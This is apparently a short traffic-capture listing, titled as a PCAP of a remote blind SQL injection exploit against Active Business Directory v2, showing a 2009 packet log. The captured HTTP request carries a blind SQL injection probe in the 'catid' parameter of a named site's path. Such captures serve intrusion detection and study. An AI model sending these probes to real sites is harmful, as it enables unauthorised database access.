Active Business Directory v2 RemoteBlind SQL Injection Attack Exploit Traffic PCAP

2009-01-01 09:36:59.374040 PPPoE [ses 0x976] IP 117.195.143.198.2308 > 208.106.128.136.80: Flags [P.], seq 1:438, ack 1, win 65535, length 437: HTTP: GET /demoactivebusinessdirectory/default.asp?catid=0+and+1=0 HTTP/1.1.. v…!E…W?@…K_u….j.. ..PJ..(f).tP…….GET /demoactivebusinessdirectory/default.asp?catid=0+and+1=0 HTTP/1.1Host: www.activewebsoftwares.comUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-gb,en;q=0.5Accept-Encoding: gzip,deflateAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Keep-Alive: 300Connection: keep-alive 2009-01-01 09:37:00.221949 PPPoE [ses 0x976] IP 208.106.128.136.80 > 117.195.143.198.2308: Flags [.], … Read more